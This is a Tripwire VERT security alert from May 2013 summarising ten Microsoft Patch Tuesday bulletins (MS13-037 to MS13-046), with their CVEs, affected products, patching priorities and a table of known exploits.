May 14, 2013 5:00 PM (PT)
The Tripwire VERT Alert is brought to you by Tripwire VERT, Tripwire's research team. VERT Alerts are distributed for Microsoft Patch Tuesday and for significant security threats.
Today’s VERT Alert addresses 10 new Microsoft Security Bulletins. VERT is actively working on coverage for these bulletins in order to meet our 24-hour SLA and expects to ship ASPL-510 on Wednesday, May 15th.
| MS13-037 | JSON Array Information Disclosure Vulnerability | CVE-2013-1297 |
| Multiple Use After Free Vulnerabilities in Internet Explorer | MULTIPLE | |
| MS13-038 | Internet Explorer user After Free Vulnerability | CVE-2013-1347 |
| MS13-039 | HTTP.sys Denial of Service Vulnerability | CVE-2013-1305 |
| MS13-040 | XML Digital Signature Spoofing Vulnerability | CVE-2013-1336 |
| Authentication Bypass Vulnerability | CVE-2013-1337 | |
| MS13-041 | Lync RCE Vulnerability | CVE-2013-1302 |
| MS13-042 | Multiple Microsoft Publisher Remote Code Execution Vulnerabilities | MULTIPLE |
| MS13-043 | Word Shape Corruption Vulnerability | CVE-2013-1335 |
| MS13-044 | XML External Entities Resolution Vulnerability | CVE-2013-1301 |
| MS13-045 | Windows Essentials Improper URI Handling Vulnerability | CVE-2013-0096 |
| MS13-046 | DirectX Graphics Kernel Subsystem Double Fetch Vulnerability | CVE-2013-1332 |
| Win32k Buffer Overflow Vulnerability | CVE-2013-1333 | |
| Win32k Window Handle Vulnerability | CVE-2013-1334 |
MS13-037
This month starts the same way that every other month does, with Internet Explorer as the first bulletin. The most important take away of this patch is that it contains fixes for a Pwn2Own 2013 vulnerability, CVE-2013-2551, as well as a defense in depth fix that originated at Pwn2Own. Internet Explorer is usually the first thing you should patch and this month is no different. We actually have a three-way tie for “first patch to install”, with two Internet Explorer patches and the HTTP.sys patch all sitting at the top of the list. Installation order should depend on the purpose of the system. Patch IE first for workstations and HTTP.sys first for servers.
MS13-038
The second bulletin of the month is also the second IE bulletin of the month. This one could almost be considered an Out of Band and is a direct response to the recent IE 0-day reported on the FireEye Blog. Since there are known exploits in the wild, this patch should be installed ASAP.
MS13-039
MS13-039 is a rare bulletin, it affects only Microsoft’s newest operating systems. The vulnerability exists within HTTP.sys, which means that anything using it for web capabilities (e.g. IIS) is affected by this issue. The issue is caused when a malicious HTTP request is received, triggering an infinite loop in the HTTP stack. If you’re running a web server on Windows Server 2012, this should be at the top of your list.
MS13-040
Up next, we have the .NET Framework. The issues in .NET are relatively minor; the most important issue is that the signature of an XML file can be spoofed due to a lack of validation.
MS13-041
This bulletin resolves an issue affecting Microsoft Lync and its predecessor, Microsoft Communicator. Successful exploitation of the vulnerability requires that the user accept a program-sharing request from a malicious user. Until the patch is applied, users should be advised to avoid sharing requests from users they don’t know and/or trust.
MS13-042
The biggest bulletin of the month, MS13-042, kicks off a chain of three Microsoft Office related bulletins. The 11 CVEs patched by MS13-042 all represent code execution issues when opening malicious Publisher documents. Publisher 2003, 2007, and 2010 are affected.
MS13-043
The second Office vulnerability this month affects Microsoft Word 2003 and Word Viewer. A malicious RTF document can trigger the vulnerable code, which means that the biggest risk comes from RTF-formatted email to recipients that have reconfigured Outlook 2003 to use Word 2003 as the default mail reader.
MS13-044
The final Office vulnerability affects Visio and is a rather interesting Information Disclosure issue. A specially crafted document could send a local file to a remote server when opened with Visio. As with Publisher, the affected versions are 2003, 2007, and 2010.
MS13-045
The second last bulletin of the month fixes an issue with Windows Writer, a component of Windows Essentials. Removing the Windows Writer URI handler easily mitigates the issue, which allows an attacker to overwrite files on the local file system. Users of Windows Essentials should also note that both the 2011 and 2012 versions of Windows Essentials are affected but a patch has not been released for 2011. Users of this version should upgrade to Windows Essentials 2012.
MS13-046
The final bulletin this month is one that we’ve grown accustom to seeing. It contains privilege escalation issues affecting Windows Kernel-Mode Drivers. Win32K and DirectX are specifically affected by the vulnerabilities listed in this bulletin.
As always, VERT recommends that you apply patches as soon as possible but also that you fully vet patches (when possible) before applying them to production systems.
Ease of Use (published exploits) to Risk Table
|
Automated Exploit
|
MS13-038 |
|
|||||
|
Easy
|
|||||||
|
Moderate
|
|||||||
|
Difficult
|
|||||||
|
Extremely Difficult
|
|||||||
|
No Known Exploit
|
MS13-039 | ||||||
|
Exposure
|
Local Availability
|
Local
Access |
Remote Availability
|
Remote Access
|
Local Privileged
|
Remote Privileged
|
All data and commentary is based on information available when the VERT Alert is published. The VERT Alert may be updated on the website as new information surfaces: http://www.ncircle.com/index.php?s=resources_VERT-Alert.